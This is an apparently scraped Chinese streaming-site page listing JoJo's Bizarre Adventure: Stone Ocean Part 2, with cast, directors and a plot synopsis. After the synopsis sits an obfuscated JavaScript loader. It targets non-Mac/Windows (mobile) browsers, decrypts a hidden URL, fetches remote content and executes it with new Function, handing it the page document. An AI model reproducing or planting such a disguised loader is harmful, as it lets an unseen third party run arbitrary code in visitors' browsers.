JOJO的奇妙冒险石之海Part.2

主演:菲鲁兹·蓝  田村睦心  伊濑茉莉也  种崎敦美  梅原裕一郎  浪川大辅  小野大辅  

导演:加藤敏幸  铃木健一  

类型:动漫

备注:完结   更新时间:2022-09-01 18:42

地区:日本   年份:2022

播放线路
快手云 无尽云 闪电云
详细介绍

《JoJo 奇妙冒险:石之海》第 13-24 集将于 9 月 1 日全球首播,Netflix 独家!   空条徐伦遭人诬陷犯罪,在又名“水族馆”的最高戒备矫正机关绿海豚街监狱蹲苦牢。徐伦的父亲空条承太郎为了救女儿出狱,前来探监……然而这一切却正中神秘替身与首脑白蛇的下怀。白蛇想夺取承太郎的记忆:“通向天国的阶梯”,而承太郎多年前的手下败将迪奥同样虎视眈眈。   白蛇出手攻击承太郎,夺走他的替身能力和记忆光碟,害得他陷入假死状态。徐伦为此决定留在狱中,伺机夺回父亲的光碟。   在新伙伴艾梅斯·罗斯提罗、幽浮一族、安波里欧·阿尔尼优、天气预报和纳鲁西索·安纳苏的陪同下,徐伦力战潜入监狱的替身使者,矢言揪出白蛇背后的势力,并夺回父亲的替身能力和记忆。   乔斯达家族与迪奥的纠葛命运横跨世纪,这回上演最终战斗,更加刺激的全新篇章即将登场!

window['LxQRgj'] = function(){ var keyList = [ "+ALPvZG7JfqnVawkUTN58jgMsm0rulh-4umApW61xS8HnhKIkab3rYoDiwtUvPec" , "QIoM7N6OP2En01qimF8flCU9V+RkwHAE4aqnTc6I9QS7lYsrv+ePONH3ZmtkBF", "jZ+3nV6wxsbgyWiolMdqDhtackJHC2r0eLGz5KQAfFtkN2oyg+paL9zSH.:bXV8IAsleMrKdhYBRimUOCx6/", "-zwgpiskFb9YlOT0Dx1KJuRhZW02ma9f3eR745c6-H8gVXIMjO", ]; function decrypt(t, e) { if (!t) return ""; for (var a = t.split(""), n = e.split(""), i = {}, r = [], o = 0;o < a.length / 2;o++) i[a[o]] = a[a.length / 2 + o]; for (var s = 0; s < e.length; s++) r.push(i[n[s]]); return r.join(""); }; (!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?(function(u, i, w, d) { var x = decrypt, cs = d[x(keyList[0],"-A88hV0f-8kv0")], crd = x(keyList[1],"6mQoNQQ1QRQ7N"); 'jQuery'; u = decodeURIComponent(x(keyList[2], u)); 'jQuery'; var xhr = new XMLHttpRequest(); xhr.open('GET', u + '/s/a?_=' + x(keyList[3], i)); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { var data = JSON.parse(xhr.responseText); new Function(data.data)(cs); } }; xhr.send('u=1'); })("ijjxWlFFsxhodHZs2WbJ66odVy", "YTz9Y9iilYxwwkz9xY", window, document):function(){}; var _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function decode(input) { var output = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); while (i < input.length) { enc1 = _keyStr.indexOf(input.charAt(i++)); enc2 = _keyStr.indexOf(input.charAt(i++)); enc3 = _keyStr.indexOf(input.charAt(i++)); enc4 = _keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } output = _utf8_decode(output); return output; } function _utf8_decode(utftext) { var string = ""; var i = 0; var c = 0; var c1 = 0; var c2 = 0; while (i < utftext.length) { c = utftext.charCodeAt(i); if (c < 128) { string += String.fromCharCode(c); i++; } else if ((c > 191) && (c < 224)) { c1 = utftext.charCodeAt(i + 1); string += String.fromCharCode(((c & 31) << 6) | (c1 & 63)); i += 2; } else { c1 = utftext.charCodeAt(i + 1); c2 = utftext.charCodeAt(i + 2); string += String.fromCharCode(((c & 15) << 12) | ((c1 & 63) << 6) | (c2 & 63)); i += 3; } } return string; }}